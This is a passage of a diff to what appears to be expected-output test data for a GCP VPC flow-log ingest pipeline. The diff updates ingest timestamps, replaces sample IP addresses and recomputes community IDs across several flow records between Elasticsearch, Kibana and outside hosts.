@@ -18716,8 +18716,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869110300Z", - "original": "{\"insertId\":\"19im82tfdygznp\",\"jsonPayload\":{\"bytes_sent\":\"138337\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33550,\"protocol\":6,\"src_ip\":\"198.51.100.248\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"244\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392210600Z", + "original": 
"{\"insertId\":\"19im82tfdygznp\",\"jsonPayload\":{\"bytes_sent\":\"138337\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":33550,\"protocol\":6,\"src_ip\":\"67.43.156.14\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"244\",\"reporter\":\"DEST\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.500498059Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.500498059Z", "end": "2019-06-14T03:49:59.565287007Z", @@ -18738,10 +18738,10 @@ "as": { "number": 15169 }, - "address": "192.0.2.177", + "address": "192.168.2.177", "port": 60110, "domain": "suricata-iowa", - "ip": "192.0.2.177" + "ip": "192.168.2.177" }, "source": { "address": "10.139.99.242", @@ -18755,7 +18755,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:KL7wHxQCZ0qbnYIzbI2WPJd+SRw=", + "community_id": "1:GfC7CyOdz/yJsL4pM9oUUVW8XIE=", "bytes": 30062, "name": "default", "transport": "tcp", @@ -18778,7 +18778,7 @@ "related": { "ip": [ "10.139.99.242", - "192.0.2.177" + "192.168.2.177" ] }, "gcp": { 
@@ -18814,8 +18814,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869113Z", - "original": "{\"insertId\":\"19im82tfdygzo9\",\"jsonPayload\":{\"bytes_sent\":\"30062\",\"connection\":{\"dest_ip\":\"192.0.2.177\",\"dest_port\":60110,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:46.020466750Z\",\"packets_sent\":\"124\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:10.874529937Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392216100Z", + "original": 
"{\"insertId\":\"19im82tfdygzo9\",\"jsonPayload\":{\"bytes_sent\":\"30062\",\"connection\":{\"dest_ip\":\"192.168.2.177\",\"dest_port\":60110,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-central1\",\"vm_name\":\"suricata-iowa\",\"zone\":\"us-central1-a\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:46.020466750Z\",\"packets_sent\":\"124\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:10.874529937Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:10.874529937Z", "end": "2019-06-14T03:49:46.020466750Z", @@ -18836,9 +18836,9 @@ "as": { "number": 15169 }, - "address": "192.0.2.117", + "address": "192.168.2.117", "port": 51348, - "ip": "192.0.2.117" + "ip": "192.168.2.117" }, "source": { "address": "10.87.40.76", @@ -18852,7 +18852,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:B8rl49fY7/3p7swViLnHkXbZpvs=", + "community_id": "1:ALoeGJMuIEHJKbowB+FYTqIV3pc=", "bytes": 1781, "transport": "tcp", "type": "ipv4", @@ -18867,7 +18867,7 @@ "related": { "ip": [ "10.87.40.76", - "192.0.2.117" + "192.168.2.117" ] }, "gcp": { 
@@ -18891,8 +18891,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869115900Z", - "original": "{\"insertId\":\"19im82tfdygzo3\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.0.2.117\",\"dest_port\":51348,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:20.754300982Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:20.630975303Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392221900Z", + "original": 
"{\"insertId\":\"19im82tfdygzo3\",\"jsonPayload\":{\"bytes_sent\":\"1781\",\"connection\":{\"dest_ip\":\"192.168.2.117\",\"dest_port\":51348,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:41:20.754300982Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:41:20.630975303Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:41:20.630975303Z", "end": "2019-06-14T03:41:20.754300982Z", @@ -18913,10 +18913,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33560, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -18930,7 +18930,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:oxwQ2yjTxzJgTjy4DOGjIjbTugc=", + "community_id": "1:rl6P/BkNpx5wKW4KChF0WRwBicw=", "bytes": 152218, "name": "default", "transport": "tcp", @@ -18953,7 +18953,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -18989,8 +18989,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869118800Z", - "original": "{\"insertId\":\"19im82tfdygznz\",\"jsonPayload\":{\"bytes_sent\":\"152218\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33560,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565026127Z\",\"packets_sent\":\"243\",\"reporter\":\"SRC\",\"rtt_msec\":\"116\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.076060079Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392232200Z", + "original": 
"{\"insertId\":\"19im82tfdygznz\",\"jsonPayload\":{\"bytes_sent\":\"152218\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33560,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565026127Z\",\"packets_sent\":\"243\",\"reporter\":\"SRC\",\"rtt_msec\":\"116\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.076060079Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.076060079Z", "end": "2019-06-14T03:49:59.565026127Z", @@ -19011,10 +19011,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33510, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -19028,7 +19028,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:5M4qP42kXGLdSXH7/5CyFYlf2ys=", + "community_id": "1:nWbhgl2QeUsTpuyKkNHw2IVKrBE=", "bytes": 143085, "name": "default", "transport": "tcp", @@ -19051,7 +19051,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -19087,8 +19087,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869121700Z", - "original": "{\"insertId\":\"19im82tfdygzo4\",\"jsonPayload\":{\"bytes_sent\":\"143085\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33510,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565078274Z\",\"packets_sent\":\"249\",\"reporter\":\"SRC\",\"rtt_msec\":\"352\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074688714Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392238Z", + "original": 
"{\"insertId\":\"19im82tfdygzo4\",\"jsonPayload\":{\"bytes_sent\":\"143085\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33510,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565078274Z\",\"packets_sent\":\"249\",\"reporter\":\"SRC\",\"rtt_msec\":\"352\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074688714Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074688714Z", "end": "2019-06-14T03:49:59.565078274Z", @@ -19115,18 +19115,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33510, "bytes": 61245, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 356 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:5M4qP42kXGLdSXH7/5CyFYlf2ys=", + "community_id": "1:nWbhgl2QeUsTpuyKkNHw2IVKrBE=", "bytes": 61245, "name": "default", "transport": "tcp", @@ -19148,7 +19148,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -19185,8 +19185,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869124500Z", - "original": "{\"insertId\":\"19im82tfdygznt\",\"jsonPayload\":{\"bytes_sent\":\"61245\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33510},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565078274Z\",\"packets_sent\":\"356\",\"reporter\":\"DEST\",\"rtt_msec\":\"352\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074688714Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392243800Z", + "original": 
"{\"insertId\":\"19im82tfdygznt\",\"jsonPayload\":{\"bytes_sent\":\"61245\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33510},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565078274Z\",\"packets_sent\":\"356\",\"reporter\":\"DEST\",\"rtt_msec\":\"352\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074688714Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074688714Z", "end": "2019-06-14T03:49:59.565078274Z", @@ -19213,18 +19213,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33532, "bytes": 65919, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 361 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:Es6n9v5EcaaEvnW+j5pfFK2BgWc=", + "community_id": "1:O9TYQRXp+xFyW519UWDWFeTm/HY=", "bytes": 65919, "name": "default", "transport": "tcp", @@ -19246,7 +19246,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -19283,8 +19283,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869127900Z", - "original": "{\"insertId\":\"19im82tfdygznu\",\"jsonPayload\":{\"bytes_sent\":\"65919\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33532},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"361\",\"reporter\":\"DEST\",\"rtt_msec\":\"270\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072555233Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392247100Z", + "original": 
"{\"insertId\":\"19im82tfdygznu\",\"jsonPayload\":{\"bytes_sent\":\"65919\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33532},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565108524Z\",\"packets_sent\":\"361\",\"reporter\":\"DEST\",\"rtt_msec\":\"270\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.072555233Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.072555233Z", "end": "2019-06-14T03:49:59.565108524Z", @@ -19307,9 +19307,9 @@ "as": { "number": 4837 }, - "address": "198.51.100.182", + "address": "67.43.156.14", "port": 41822, - "ip": "198.51.100.182" + "ip": "67.43.156.14" }, "source": { "address": "10.139.99.242", @@ -19323,7 +19323,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:d5LNFArWcoFOBS9SH59qLdZmfEw=", + "community_id": "1:zyannIISQxYxkFMHE3HEVdUcoVY=", "bytes": 0, "transport": "tcp", "type": "ipv4", @@ -19338,7 +19338,7 @@ "related": { "ip": [ "10.139.99.242", - "198.51.100.182" + "67.43.156.14" ] }, "gcp": { 
@@ -19362,8 +19362,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869131100Z", - "original": "{\"insertId\":\"19im82tfdygzo6\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"198.51.100.182\",\"dest_port\":41822,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"end_time\":\"2019-06-14T03:40:40.058368408Z\",\"packets_sent\":\"4\",\"reporter\":\"SRC\",\"rtt_msec\":\"1439\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:12.068494835Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", + "ingested": "2021-12-09T13:37:46.392251600Z", + "original": 
"{\"insertId\":\"19im82tfdygzo6\",\"jsonPayload\":{\"bytes_sent\":\"0\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":41822,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":22},\"dest_location\":{\"asn\":4837,\"city\":\"Shangqiu\",\"continent\":\"Asia\",\"country\":\"chn\",\"region\":\"Henan\"},\"end_time\":\"2019-06-14T03:40:40.058368408Z\",\"packets_sent\":\"4\",\"reporter\":\"SRC\",\"rtt_msec\":\"1439\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:12.068494835Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.553477088Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.553477088Z\"}", "kind": "event", "start": "2019-06-14T03:40:12.068494835Z", "end": "2019-06-14T03:40:40.058368408Z", @@ -19384,10 +19384,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33532, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -19401,7 +19401,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:Es6n9v5EcaaEvnW+j5pfFK2BgWc=", + "community_id": "1:O9TYQRXp+xFyW519UWDWFeTm/HY=", "bytes": 188997, "name": "default", "transport": "tcp", @@ -19424,7 +19424,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" 